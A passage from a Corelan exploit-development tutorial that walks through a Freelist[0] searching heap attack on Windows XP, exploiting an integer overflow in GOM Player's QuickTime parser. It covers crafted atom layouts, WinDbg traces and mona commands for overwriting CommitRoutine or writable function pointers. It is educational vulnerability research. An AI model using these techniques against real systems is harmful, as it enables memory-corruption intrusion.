     ChunkPtr: 0x00166FF8, Header: 0x8 bytes, UserPtr: 0x00167000, Flink: 0x00160178, Blink: 0x00166000, ChunkSize: 0x1000 (4096), Usersize: 0x1000 (4096)

Please note, as with our previously described techniques, in order for this to work the address we overwrite Flink with must be valid and have READWRITE access. Therefore, we’ll need to replace our value of 0x41414141 with a pointer that is valid and exists at a region with READWRITE access.

Furthermore, I mentioned that the address we use to overwrite our Flink pointer must also point to a location that represents a fake (yet valid) valid heap chunk. All this really means is that 8 bytes prior to this location exist and are readable and that 8 bytes after this address contain 2 readable pointers which would represent the Flink and Blink of our fake chunk.

There are some slight caveats to this description, but for now don’t worry about it as we’ll discuss them later in this section.

A semi-visual representation of this “fake” heap chunk can be found below:

Self Size: Uint2B  -  Size of current chunk # Must later match our requested allocation size (+1)
Previous Size: Uint2B  -  Size of previous Chunk # This field can be any value
Chunk Cookie: Uint1B  -  Security Cookie # This field can be any value
Chunk Flag: Uint1B # This field can be any value
Unused: Uint1B # This field can be any value
Segment Index: Uint1B # This field can be any value
Flink: Ptr32  -  Pointer to next chunk in current list # This value must be a valid pointer with READWRITE access
Blink: Ptr32  -  Pointer to prior chunk in current list # This value must be a valid pointer with READWRITE access

Now the major obstacle we must overcome when trying to apply this type of attack is to identify fake heap chunks that are located in a region where, triggering an overwrite will be useful for us. The two options that we will discuss are writable function pointers and pointers located in the _HEAP structure.

The reasoning behind using writable function pointers is obvious as successful exploitation of this issue will cause the allocation request to return a pointer to our writable function pointer. Then, as long as we are able to control the control the contents of the function which requested this allocation, we will be able to overwrite the function pointer with an arbitrary value of our choosing. Therefore, gaining control over the instruction pointer.

The reasoning behind overwriting portions of the _HEAP structure, however, are not so clear. To explain, I’d like to reiterate a concept discussed in John McDonald and Chris Valasek’s 2009 paper, Practical Windows XP/2003 Heap Exploitation. In their paper, they discuss a method of gaining control over the instruction pointer by overwriting the CommitRoutine pointer located at offset +0x57C in the heap base (_HEAP). This pointer is called by the heap manager when an allocation request is received that is larger than what is available and the heap needs to be extended (via RtlExtendHeap). So, if we can overwrite this pointer and trigger an allocation request that is larger than the largest entry in Freelist[0], we can redirect the flow of exection.

Now, in order to overwrite this pointer we must identify a region of the _HEAP structure which represents a valid heap chunk. Fortunately for us, there are several.

As i mentioned in the Heap Basics section, the Freelist structure contains 128 list head entries, each of which correspond with a Freelist of a particular size. If a Freelist contains free chunks, these list head entries (compromised of Flink and Blink pointers) will point to the first and last chunk on the list. If no entries exist for a Freelist, then the Flink and Blink pointers will point back to themselves.

This means that these list head entries will always contain valid pointers. This is useful in the fact that we can use these list head entries as our fake heap chunks. For instance, consider the following example which uses the list head of Freelist[2] as our fake chunk.

0:000> dc 00160180 L4
00160180  00160180 00160180 00160188 00160188  ................

Self Size: 0x180 (0xC00 bytes)
Previous Size: 0x16 (0xB0 bytes) # Value has no affect on this attack
Chunk Cookie: 0x80 # Value has no affect on this attack
Chunk Flag: 0x1 # Value has no affect on this attack
Unused: 0x16 # Value has no affect on this attack
Segment Index: 0x0 # Value has no affect on this attack
Flink: Ptr32  -  0x00160188
Blink: Ptr32  - 0x00160188

Good. So here we can see that if we were to apply the data at 0x00160180 to the structure of a Freelist heap entry, it would represent a valid chunk of 0xC00 byes. With that, if we were to replace our 0x41414141 with the UserPtr of this chunk, 0x00160188 (remember that the UserPtr is located 8 bytes after the start of the chunk), Freelist[0] would now have the following structure.

[+] FreeList[00] at 0x00160178, Expected size: >1016 (>0x3f8), Flink: 0x00165000, Blink: 0x00167000
     ChunkPtr: 0x00164FF8, Header: 0x8 bytes, UserPtr: 0x00165000, Flink: 0x00160180, Blink: 0x00160178, ChunkSize: 0x8 (8), Usersize: 0x8 (8) 
     ChunkPtr: 0x00160180, Header: 0x8 bytes, UserPtr: 0x00160188, Flink: 0x00160188, Blink: 0x00160188, ChunkSize: 0xC00 (3072), Usersize: 0xC00 (3072)

With our Flink overwritten with a value that now points to a fake (albeit valid) heap chunk, the trick here is that if we can control the size of the next allocation request, particularly, if we can request a chunk of 0xBF8 ((0xC00-8) we must subtract 0x8 bytes for the heap chunk’s header), the heap manager will return the pointer 0x00160180. Then, if we can write 0x3FC bytes (0x0016057C-0x00160180), we will overwrite the CommitRoutine pointer.

The reason this happens is when the allocation request is received, the heap manager will determine that 0xBF8 is larger than 0x400 (1024 bytes) and begin searching Freelist[0]. It will first check that the last chunk in the list is large enough to service this request. Now remember, although we’ve essentially broken the chain maintained by our doubly-linked list, the Freelist[0] list head will still contain a valid pointer to the last chunk in our list, located at 0x00167000:

[+] FreeList[00] at 0x00160178, Expected size: >1016 (>0x3f8), Flink: 0x00165000, Blink: 0x00167000
...truncated...
     ChunkPtr: 0x00166FF8, Header: 0x8 bytes, UserPtr: 0x00167000, Flink: 0x00160178, Blink: 0x00166000, ChunkSize: 0x1000 (4096), Usersize: 0x1000 (4096)

Since the last chunk in our list is larger than our requested size of 0xBF8, the heap manager will begin traversing the list, from smallest chunk to largest in order to identify an appropriate chunk to service this allocation request. It will begin with the first chunk which we’ve corrupted with our overflow. Remember, we’ve modified the size of this chunk so that the heap manager would believe it is only 0x8 bytes. As this is smaller than the requested size, the heap manager will go to the next chunk by following the Flink which we’ve manipulated to point to 0x00160180. It will then retrieve the size of this chunk and determine that it is in fact large enough to service our request.

The heap manager will then unlink this chunk. Funny enough, by using an empty Freelist list head as our fake heap chunk, the safe unlink check is passed. With this our chunk is successfully unlinked and a pointer to 0x00160180 is returned to the application. However, it’s important to note that bypassing the safe unlink check is not necessary in order to utilize the Freelist[0] searching attack in order to return an arbitrary pointer. More on this in a bit.

Unfortunately, this method may have some potential side affects. During the unlink procedure, the heap manager will modify the Blink of our fake heap chunk. In doing so, the heap manager will detect this difference and since the Flink and Blink do not both point to the list head, it will believe that a chunk now exists at this list. This may or may not affect exploitation.

Now what if we didn’t want to target the HEAP base structure? If exploitation occurs within a private heap, the base address of this HEAP may not be reliable. Another alternative would be to target a writable function pointer. If we could find a writable function pointer that resembled a valid heap chunk or data that resembled a valid heap chunk prior to a writable function pointer, we could use force the heap manager to return an arbitrary pointer to that location.

In order to identify potential heap chunks, corelanc0d3r recently implemented a new feature into !mona which allows us to identify function pointers, or offsets to function pointers, which resemble valid heap chunks (contains readable Flink and Blink pointers). We’ll touch on this more in a bit during the “Application Specific Technique” section.

Using the !mona function described above, we’ve found a writable function pointer which resembles a valid heap chunk in ntdll.dll:

0x7c97f10c : 0x7c97f10c gets called from ntdll.dll at 0x7c9293ec (CALL DWORD PTR DS:[7C97F10C]) -  Chunksize: 864 (0x360), UserPtr 0x7c97f10c, Flink 0x7c812ef8, Blink 0x00260000 -  {PAGE_READWRITE}

Let’s apply the heap chunk structure to this pointer:

0:000> dc 7c97f104 L4
00160180  00160180 00160180 00160188 00160188  ................

Self Size: 0x6C (0x360 bytes)
Previous Size: 0x6C (0xB0 bytes) # Value has no affect on this attack
Chunk Cookie: 0x0 # Value has no affect on this attack
Chunk Flag: 0x0 # Value has no affect on this attack
Unused: 0x0 # Value has no affect on this attack
Segment Index: 0x0 # Value has no affect on this attack
Flink: Ptr32  -  0x7c812ef8
Blink: Ptr32  - 0x00260000

Good. Once again we see that we have what would represent a valid heap chunk with a size of 0x360. With that, let’s assume that our Flink has been overwritten with this UserPtr (0x7C97F10C).

[+] FreeList[00] at 0x00160178, Expected size: >1016 (>0x3f8), Flink: 0x00165000, Blink: 0x00167000
     ChunkPtr: 0x7C97F104, Header: 0x8 bytes, UserPtr: 0x00165000, Flink: 0x7C97F10C, Blink: 0x00160178, ChunkSize: 0x8 (8), Usersize: 0x8 (8) 
     ChunkPtr: 0x00160180, Header: 0x8 bytes, UserPtr: 0x00160188, Flink: 0x00160188, Blink: 0x00160188, ChunkSize: 0x360 (864), Usersize: 0x360 (864)

Now, if the application were to issue an allocation request of 0x358 bytes, the heap manager would begin traversing the list. In this case, as our request is under 0x400 (1024 bytes), it would begin checking from Freelist[108], until the end. In this case, no other Freelists exist so the heap manager would then check Freelist[0]. It would first check the final chunk in Freelist[0] to ensure that there is in fact enough space available to service the requst. As there is, the heap manager would then begin traversing Freelist[0] from top to bottom. Again, the first chunk with a size of 0x8 bytes is too small so it would follow this chunks Flink to 0x7C97F10C. As this chunk is in fact large enough to service the request, the heap manager will attempt to unlink it.

However, in this case as the Flink has been corrupted and the doubly-linked list is now broken, the safe unlink check will fail. Fortunately for us this doesn’t mean much. The safe-unlink check only means that the chunks pointed to by our Flink and Blink pointers will not be updated to account for the unlink (triggering the arbitrary 4-byte overwrite).

The heap manager will then call RtlReportHeapCorruption. This again does not affect us as the purpose of this function is to output to the debugger, if being debugged, that the heap chunk is corrupted. However, under Windows XP, when heap corruption is reported, execution is continued. Under Windows Vista and later, triggering heap corruption will actually terminate the process.

As this is not the case, the allocation process will continue and the pointer specified by our Flink will be returned. We can see the instructions responsible for this behavior below:

eax=7c97f104 ebx=00000000 ecx=0000006c edx=0f92fe20 esi=7c97f104 edi=7c97f10c{ntdll!RtlpStartThreadFunc(7c97f10c)}
eip=7c911066 esp=0012bb3c ebp=0012bd5c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
ntdll!RtlAllocateHeap+0x41d:
7c911066 897dd0          mov     dword ptr [ebp-30h],edi ss:0023:0012bd2c=00000000
...
eax=00000000 ebx=00000000 ecx=00000000 edx=04880608 esi=00000000 edi=00000000
eip=7c9110ea esp=0012bb3c ebp=0012bd5c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
ntdll!RtlAllocateHeap+0xe53:
7c9110ea 8b45d0          mov     eax,dword ptr [ebp-30h] ss:0023:0012bd2c={ntdll!RtlpStartThreadFunc (7c97f10c)}

Application Specific Technique

Now, to apply this technique to our GOM specific vulnerability. First, let’s take a look at the heap at the start of our vulnerable function.

Please note: We’re going to redo this section as the base address of this private heap varies widely. The addresses used here will not be the same as described above in the Freelist[0] insert attack.

[+] FreeList[00] at 0x03200178, Expected size: >1016 (>0x3f8)
     ChunkPtr: 0x03207150, Header: 0x8 bytes, UserPtr: 0x03207158, Flink: 0x03208110, Blink: 0x03200178, ChunkSize: 0x6b0 (1712), Usersize: 0x6b0 (1712) 
     ChunkPtr: 0x03208108, Header: 0x8 bytes, UserPtr: 0x03208110, Flink: 0x03205e10, Blink: 0x03207158, ChunkSize: 0xef8 (3832), Usersize: 0xef8 (3832) 
     ChunkPtr: 0x03205e08, Header: 0x8 bytes, UserPtr: 0x03205e10, Flink: 0x03200178, Blink: 0x03208110, ChunkSize: 0x10d8 (4312), Usersize: 0x10cc (4300)

Here we can see that Freelist[0] has been populated with 3 chunks with the sizes 0x6B0, 0xF00, and 0x10D8 respectively. Now, as with the Freelist[0] insert attack, we need to know what is allocated and freed prior to an after our write instruction. Rather than reiterating each step of the process, I’m simply going to list the results below:

# Prior to write instruction:
# Chunk containing entire &quot;stsz&quot; atom - RtlAllocateHeap hHEAP 0x03200000, size=0x100, chunk at 0x03207158
# Pointer chunk - RtlAllocateHeap hHEAP 0x03200000, size=0x14, chunk at 0x03207260
# Chunk used for our &quot;sample size table&quot; - RtlAllocateHeap hHEAP 0x03200000, size=0xec, chunk at 0x03207280

# After write instruction:

# RtlFreeHeap hHeap (0x03207158), size=0x00000100
  03207158  00010000 7a737473 00000000 00000000  ....stsz........
  03207168  3b000000 b5940000 d4520000 a8520000  ...;......R...R.
  03207178  2c520000 7c520000 80520000 a4520000  ..R,..R|..R...R.

# Chunk containing pointer information - RtlAllocateHeap hHEAP 0x03200000, size=0x48, chunk at 0x03207378
# Chunk containing entire &quot;stco&quot; atom - RtlAllocateHeap hHEAP 0x03200000, size=0x8c, chunk at 0x032073c8
# Chunk containing more pointer infomation - RtlAllocateHeap hHEAP 0x03200000, size=0x10, chunk at 0x03207460
# Chunk containing expanded &quot;chunk offset table&quot; - RtlAllocateHeap hHEAP 0x03200000, size=0xf8, chunk at 0x03207478

# RtlFreeHeap hHeap (0x032073c8), size=0x00000090
  032073c8  8c000000 6f637473 00000000 1f000000  ....stco........
  032073d8  d0140000 85a90000 014f0100 a9f30100  ..........O.....
  032073e8  cd980200 0d3f0300 c1e40300 958a0400  ......?.........

Ok, good. So with this information we can begin formulating an attack. Now we know that after our overwrite we need to be able to control the size and contents of our next allocation. Unfortunately for us, it seems that we cannot control the very next allocation at 0x04887378 with a size of 0x48 bytes. To rememedy this, we need to ensure that we free an object that is 0x48 bytes. As the chunk containing the “stsz” atom is the is freed immediately before this allocation, we can simply change the size of this atom to be 0x48 bytes. Then when our chunk is freed, the next allocation will retrieve it.

Please note that this chunk will be freed to the LAL rather than Freelists

Next, we need to trigger our overflow so that it only overwrites up to the Flink of the first chunk in Freelist[0]. To do so, we’ll need to set the size of our “number of entries” element to 0x8000000A. This will trigger an allocation size of 0x28 bytes (0x8000000A * 4 == 0x28). And as the “sample size table” is actually 0x34 bytes (0x40-0xC for the “stsz” header data), this will write exactly 0xC bytes beyond out buffer.

And finally, as we discussed about we have two methods that we could potentially use as targets for our fake chunks: pointers within the _HEAP structure and writable function pointers. The first that we’ll demonstrate is a pointer located in the _HEAP structure.

As we’re targeting the private heap with a base of 0x03200000, we’ll use the same Freelist head (Freelist[2]), that we had used in the section above. If we were to apply the heap chunk format to this data, it would appear as follows:

0:000> dc 03200180 L4
03200180  03200180 03200180 03200188 03200188  .. ... ... ... .

Self Size: 0x180 (0xC00 bytes)
Previous Size: 0x320 (0x800 bytes) # Value has no affect on this attack
Chunk Cookie: 0x80 # Value has no affect on this attack
Chunk Flag: 0x1 # Value has no affect on this attack
Unused: 0x20 # Value has no affect on this attack
Segment Index: 0x3 # Value has no affect on this attack
Flink: Ptr32  -  0x03200188
Blink: Ptr32  - 0x03200188

Finally, in addition to overwriting the Flink of our target chunk, we’re also overwriting the 0x8 bytes of the heap chunk’s metadata which precedes it. In order to ensure that our Flink is followed, we’ll set a Size and PrevSize of 0x0001 (0x8 bytes). The values applied to the remaining 0x4 bytes will have no bearing on our exploitation.

Good. Now with this information we can begin crafting our “stsz” atom. With the information listed above, it should now have the following structure:

Please note: I’ve also replaced the Sample Size Table contents with a cyclical pattern.

Size:  0x00000048 (Causes allocation of 0x48 bytes)
Type:  0x7374737A (ASCII stsz) 
Version:  0x00 
Flags:  0x000000 
Sample Size: 0x00000000
Number of Entries: 0x8000000100 (Causes allocation of 0x400 bytes)
Sample Size Table(1):  0x41613041
Sample Size Table(2):  0x61314161
...
# Begins at file offset 0x134B
Self Size: 0x0001 (0xC00 bytes)
Previous Size: 0x0001 (0x800 bytes) # Value has no affect on this attack
Chunk Cookie: 0x58 # Value has no affect on this attack
Chunk Flag: 0x58 # Value has no affect on this attack
Unused: 0x58 # Value has no affect on this attack
Segment Index: 0x58 # Value has no affect on this attack
Flink: 0x03200180

Excellent. I hope you’re still with me. Next, we’ll need to craft the “stco” atom so that it matches the allocation size specified by our fake chunk. To do so, all we need to do is change the “size” element of the “stco” atom to be 0xBF8 (0xC00 – 0x8 to account for the heap header). Also, if you recall earlier when we documented the structure of the “stco” atom, the “number of entries” element, which controls our 7th allocation, exists at offset 0xC from the start of the “stco” atom. Following that is the “chunk offset table”. For demonstration purposes, let’s go ahead and fill this with a cyclical pattern as well.

When it’s all said and done, your “stco” atom should look as follows:

Size:  0x00000BF8 (Triggers an allocation of 0xBF8 bytes)
Type:  0x7374636F (ASCII stco) 
Version:  0x00 
Flags:  0x000000 
Number of Entries: 0x000000008 (Triggers an allocation of 0x40 bytes) # Not necessary at the moment
Chunk Offset Table(1):  0x41613041
Chunk Offset Table(1):  0x61314161
...

Excellent. Let’s go ahead and save these changes and observe the behavior in our debugger. To avoid any discrepancies, I’ve included a sample which includes all of the changes discussed above, which you can find here.

We’ll first set a breakpoint just after our write instructions have completed (GSFU!DllUnregisterServer+0x236bd) in order to determine that the Flink has been successfully overwritten.

[+] FreeList[00] at 0x03200178, Expected size: >1016 (>0x3f8)
     ChunkPtr: 0x032071f0, Header: 0x8 bytes, UserPtr: 0x032071f8, Flink: 0x03200188, Blink: 0x03200178, ChunkSize: 0x8 (8), Usersize: 0x-50 (-80) 
     ChunkPtr: 0x03200180, Header: 0x8 bytes, UserPtr: 0x03200188, Flink: 0x03200188, Blink: 0x03200188, ChunkSize: 0xc00 (3072), Usersize: 0xbe0 (3040)

Excellent. Now that we've confirmed that our Flink has been overwritten with our supplied value of 0x03200188, let's go ahead and step forward until our "stsz" chunk has been freed.

0:000> bp ntdll!RtlFreeHeap "j ((poi(esp+4)==0x03200000) & (poi(esp+c)!=0)) '.printf \"RtlFreeHeap hHeap (0x%p), size=0x%p\\n\", poi(esp+c), wo(poi(esp+c)-8)*8-8; dc poi(esp+c) LC; .echo; 'g';"
0:000> g
RtlFreeHeap hHeap (0x03207158), size=0x00000048
03207158  48000000 7a737473 00000000 00000000  ...Hstsz........
03207168  0a000080 41306141 61413161 33614132  ....Aa0Aa1Aa2Aa3
03207178  41346141 61413561 37614136 41386141  Aa4Aa5Aa6Aa7Aa8A

Good. If we were to check the status of our LAL after the free operation has completed we would see the following:

LAL [10] @0x03200868, Expected Chunksize 0x50 (80), Flink : 0x03207158
  1 chunks:
     ChunkPtr: 0x03207150, UserPtr: 0x03207158, Flink: 0x00000000, ChunkSize: 0x50, UserSize: 0x48, Userspace: 0x48 (Busy)

Next, let's step through each of our allocations until we reach the allocation responsible for containing our "stco" atom.

bp ntdll!RtlAllocateHeap+0x117 "j (poi(@esp+4)==0x03200000) '.printf \"RtlAllocateHeap hHEAP 0x%p, size=0x%x, chunk at 0x%p\\n\", poi(@esp+4), poi(esp+c), eax'; 'g';"

RtlAllocateHeap hHEAP 0x03200000, size=0x48, chunk at 0x03207158
RtlAllocateHeap hHEAP 0x03200000, size=0xbf8, chunk at 0x03200188

Excellent. There’s several things to note about the information provided above. First, we can see that our uncontrolled allocation of 0x48 bytes was taken from our recently Freed entry on the LAL (0x03207158). Next, and most importantly we can see that we were in fact able to return a pointer to our arbitrary location at the heap base (0x03200188). Next, let's set a hardware breakpoint on our CommitRoutine (0x0320057C) to ensure that it overwritten.

0:000> ba w 4 0320057C
0:000> g
Breakpoint 3 hit
eax=00000754 ebx=03204c90 ecx=000000c9 edx=00000754 esi=032053cc edi=032005b8
eip=03c155fe esp=0012bd84 ebp=03200188 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
GSFU!DllUnregisterServer+0x431e:
03c155fe f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

dt _HEAP 03200000
...truncated...
+0x57c CommitRoutine    : 0x42326842     long  +42326842

Great. Finally, let's check the start of our allocated block to ensure that the entire contents of our "stco" atom has been written.

0:000> dc 0x03200188
03200188  f80b0000 6f637473 00000000 08000000  ....stco........
03200198  41306141 61413161 33614132 41346141  Aa0Aa1Aa2Aa3Aa4A
032001a8  61413561 37614136 41386141 62413961  a5Aa6Aa7Aa8Aa9Ab
032001b8  31624130 41326241 62413362 35624134  0Ab1Ab2Ab3Ab4Ab5
032001c8  41366241 62413762 39624138 41306341  Ab6Ab7Ab8Ab9Ac0A
032001d8  63413163 33634132 41346341 63413563  c1Ac2Ac3Ac4Ac5Ac
032001e8  37634136 41386341 64413963 31644130  6Ac7Ac8Ac9Ad0Ad1
032001f8  41326441 64413364 35644134 41366441  Ad2Ad3Ad4Ad5Ad6A

Excellent. Here we can see that the contents of the “chunk offset table” were used to overwrite much of the _HEAP structure, particularly our target, the RtlCommitRoutine located at 0x0320057C. With this, if we are able to trigger an allocation request that is larger than the largest entry in Freelist[0], we can gain control over the instruction pointer.

However, it seems that I’ve made quite a mess of the heap structure by overwriting it with a cyclical pattern. Before we can make any other allocations, we’ll need to replace it. And by “we”, I mean you. Good luck 😉

Now it would seem that I’ve left you with a terrible ending to this tactic. Guilty as charged. It’s 1:30AM at the time of writing and we have one more minor item to cover. Earlier in this section, I mentioned that you can also choose to target writable function pointers. However, identifying these pointers by hand would be incredibly difficult. Fortunately for us, the gracious corelanc0d3r has recently implemented some changes to !mona that make our task at hand much easier. Let’s take a look at the new and improved “fwptr” function in !mona:

Usage of command 'fwptr' :
---------------------------
Search for calls to pointers in a writeable location, 
will assist with finding a good target for 4byte arbitrary writes
Optional Arguments:
    -bp : Set breakpoints on all found CALL instructions
    -patch : Patch the target of each CALL with 0x41414141
    -chunksize <nr> : only list the pointer if location-8 bytes contains a size value larger than <nr>
                      (size in blocks, not bytes)
    -offset <nr> : add <nr> bytes of offset within chunk, after flink/blink pointer 
                  (use in combination with -freelist and -chunksize <nr>)
    -freelist : Search for fwptr that are preceeded by 2 readable pointers that can act as flink/blink

Here we can see the addition of 3 new arguments: chunksize, offset, and freelist. By specifying the "-freelist" argument, !mona will attempt to identify writable function pointers which represent a fake heap chunk. And by that, I mean a writable function pointer which is preceded by 8 readable bytes and followed by two readable pointers (which represent our Flink and Blink). In cases where you cannot control the size of the allocation which will use this "fake" chunk, you can specify the size of the allocation in conjunction with the "-chunksize" argument. !mona will then display fake heap chunks which also match the requested allocation size. And finally, under certain circumstances, you may not always be able to control the first 4 bytes of an allocation. Therefore, it may be necessary to find fake heap chunks which exist at a specified offset from our writable function pointer. To satisfy this requirement, you can use the "-offset" argument in conjunction with the respective offset of the allocation where you can control the data being written. A perfect example of this is our "stco" atom. Although we can essentially control the entire contents of the atom, it would be preferable for us to use the contents of our "chunk offset table" to overwrite a function pointer. This would require an offset of 0xC (12) or more. Putting this all together, if we wanted to identify writable function pointers which are preceded by a fake heap chunk by a12 byte offset, where the size of these heap chunks do not matter (as we control the allocation size), we can use the following syntax:

!py mona fwptr -cm rebase=false -freelist -chunksize 1 -offset 0xC

Running this command under GOM provides roughly 5000 results. Unfortunately for us, many of them are not useable. This is because many of these chunks often contain significantly larger than normal size value. When using chunks with a size that is greater than the largest entry found in Freelist[0], our subsequent allocation request used to retrieve this chunk will trigger a call to RtlExtendHeap. Doing so will likely trigger an access violation as we’ve corrupted the doubly-linked listed maintained by Freelist[0].

However, with this we still have some options. Seeing as how we can perform essentially an n-byte overwrite, we can use this technique to overwrite pointers that our adjacent to our usable heap chunks. Using !mona, you can also try using various offsets in order to find additional usable heap chunks (i.e. +0x12 or greater).

A simple demo of this type of attack can be found here. This proof of concept does NOT gain code execution. It simply demonstrates an arbitrary n-byte write beginning at the following function pointer.

0x7c88732c : 0x7c88732c gets called from kernel32.dll at 0x7c83dd67 (CALL DWORD PTR DS:[7C88732C]) -  Chunksize: 664 (0x298), UserPtr 0x7c887320, Flink 0x0044002e, Blink 0x004c004c -  {PAGE_READWRITE}

Also, I’ve included a series of WinDbg breakpoints which I’ve found to be helpful when analyzing this type of attach. Apply these breakpoints just prior to your targeted allocation request:

r @$t0 = 1
bp 7c910ed2 ".printf \"\\nRetrieve size of last chunk in the list: 0x%04x\\n\", wo(eax); gc"
bp 7c910ed5 ".printf \"Is final chunk larger than requested: \"; .if (@eax > @edi) {.printf \"Yes - (0x%p > 0x%p)\\n\", eax, edi;gc} .else {.printf \"No\\n\";gc}"
bp 7c910edd ".printf \"Retrieving UserPtr of chunk in Freelist[0]: 0x%p\\n\", poi(ebp-28h); gc"
bp 7c910ee0 ".printf \"Loading Flink of chunk 0x%x: 0x%p\\n\", @$t0, poi(eax); r@$t0=@$t0+1; gc"
bp 7c910ef4 ".printf \"  Load ChunkSize: 0x%04x\\n\", wo(esi); gc"
bp 7c910ef7 ".printf \"  Is chunk large enough to handle request (0x%p >= 0x%p): \", @ecx, @edi; .if (@ecx >= @edi) {.printf \"Yes\\n\";gc} .else {.printf \"No\\n\";gc}"
bp 7c910f20 ".printf \"Performing Security Check: \"; .if (poi(@eax+4)!=@edi) {.printf \"Failed\\n\";gc} .else {.printf \"Passed\\n\";gc}"
bp 7c910f86 ".printf \"Are chunk sizes different: \"; .if (@ebx and @ebx) {.printf \"Yes\\n\";gc} .else {.printf \"No\\n\";gc}"
bp 7c910f8e ".printf \"Is difference more than 1 block: 0x%p\", @ebx; .if (@ebx>0x1) {.printf /ow \"\\nYes. Splitting block!  This will likely fail!\\n\\n\";gc} .else {.printf \"\\nNo\\n\\n\";gc}"

An example of the output generated by these breakpoints can be found below. Please note, that in the following example, I used the proof of concept provided above which targets the writable function pointer located at 0x7c88732c

Retrieve size of last chunk in the list: 0x021b
Is final chunk larger than requested: Yes - (0x0000021b > 0x00000053)
Retrieving UserPtr of chunk in Freelist[0]: 0x03200178
Loading Flink of chunk 0x1: 0x032071f8
  Load ChunkSize: 0x0001
  Is chunk large enough to handle request (0x00000001 >= 0x00000053): No
Loading Flink of chunk 0x2: 0x7c887320
  Load ChunkSize: 0x0053
  Is chunk large enough to handle request (0x00000053 >= 0x00000053): Yes
Performing Security Check: Failed
Heap corruption detected at 7C887320
Are chunk sizes different: No
RtlAllocateHeap hHEAP 0x03200000, size=0x290, chunk at 0x7c887320

Why Not?

Before wrapping this up, I’d like to leave you with a few closing news in regards to why I didn’t choose this method of exploitation.

There are several issues with targeting the _HEAP base in this type of attack. The primary issue at hand is that as the overflow occurs in a private heap, the base address of this heap is likely unreliable. Therefore, specifying a static address within the heap base may possibly fail. Furthermore, by overwriting such a large portion of the _HEAP structure as we demonstrated above, you’ll likely need to reconstruct much of it in your payload to ensure that future allocations do not cause access violations as the proof of concept I’ve provided above, certainly will. Also, targeting this type of attack also requires that we can control the size of one additional allocation in order to trigger the RtlCommitRoutine. Unfortunately in the example I’ve provided, we cannot as the next allocation request, of 0x10 bytes, is out of our control. If we were able to get LAL[2] populated with a free entry prior to this allocation, we could control the following allocation, however at the time of writing, I was unable to do so.

Now, when applying this type of attack to writable function pointers, we again have no shortage of issues. During testing I was able to overwrite a number of function pointers. However, none of these pointers were triggered prior to triggering an access violation in the heap manager. Furthermore, as I mentioned above, many of the pointers returned are in fact unusable as the size of these requests are likely larger than the largest current entry within Freelist[0], and are also likely larger than the maximum possible size of an entry maintained by Freelist[0]. Again, I do believe that it is in fact possible to target writable function pointers by utilizing our n-byte write in combination with various writable function pointer to fake chunk offsets, however at the time of writing, I was unable to do so.

Conclusion

In closing, I’d simply like to reiterate the notion that I had first mentioned in my previous article. There are many ways to EIP. Depending on your application, the level of control you can exhibit over the heap, and how determined you are, there likely will always be a way. Atleast, that’s what we hope.

Also for those keeping count, !exploitable: 1 for 2. Let’s see what happens next time…

And with that I’d just like to thank my friends over at Corelan for giving me the opprotunity to release this work under their umbrella. I’d also like to thank them for the numerous hours they spent reviewing this document, listening to me complain about the nusances of the QT file format, and just generally being helpful. And thanks to corelanc0d3r specifically for implementing some of my wacky ideas into !mona even when they didn't pan out.

Thanks fellas!

I hope you found this useful 🙏🏻 🤗

If you got value from this, pass it on to someone who should see it too. 💛
Many thanks in advance!

If you want to learn all ins and outs on exploit development for Windows Userland, in a structured & hands-on way please check out my Corelan training classes. They're high-quality and affordable! And they're the perfect prep to obtain the CCED title.
We're teaching classes all over the world, check out our schedules page for more info.

Are you a student on a tighter budget? Check out ☀️ Corelan Summercamp ☀️!

Of course, if you have any questions about this article, feel free to ask questions in our Discord server.

Follow me on socials!

Have a great day!

- Peter

© Corelan Consulting BV. All rights reserved. The contents of this page may not be reproduced, redistributed, or republished, in whole or in part, for commercial or non-commercial purposes without prior written permission from Corelan Consulting bv. See our Terms of Use & Privacy Policy (https://www.corelan.be/index.php/legal) for more details.

Discover more from Corelan | Exploit Development & Vulnerability Research

Subscribe to get the latest posts sent to your email.

About the author

Corelan Team (Jason Kratzer)

Tags:

heap exploitation, peach, mona.py, fuzzing, !exploitable, overflow, windbg

Root Cause Analysis – Integer Overflows

Foreword

Introduction

Analyzing the Crash Data

Identifying the Cause of Exception

Page heap

Initial analysis

Reversing the Faulty Function

Determining Exploitability

Challenges

Prerequisites

Heap Basics

Lookaside Lists

Freelists

Preventative Security Measures

Safe-Unlinking

Heap Cookies

Application Specific Exploitation

Thoughts on This Attack

Generic Exploitation Methods

Lookaside List Overwrite

Overview

Application Specific Technique

Why Not?

Brett Moore: Wrecking Freelist[0] Since 2005

Freelist[0] Insert Attack

Overview

Application Specific Technique

Why Not?

Freelist[0] Searching Attack

Overview

Application Specific Technique

Why Not?

Conclusion

Recommended Reading

I hope you found this useful 🙏🏻 🤗

Share this post :

Discover more from Corelan | Exploit Development & Vulnerability Research

Similar/Related posts:

About the author

3 thoughts on “Root Cause Analysis – Integer Overflows”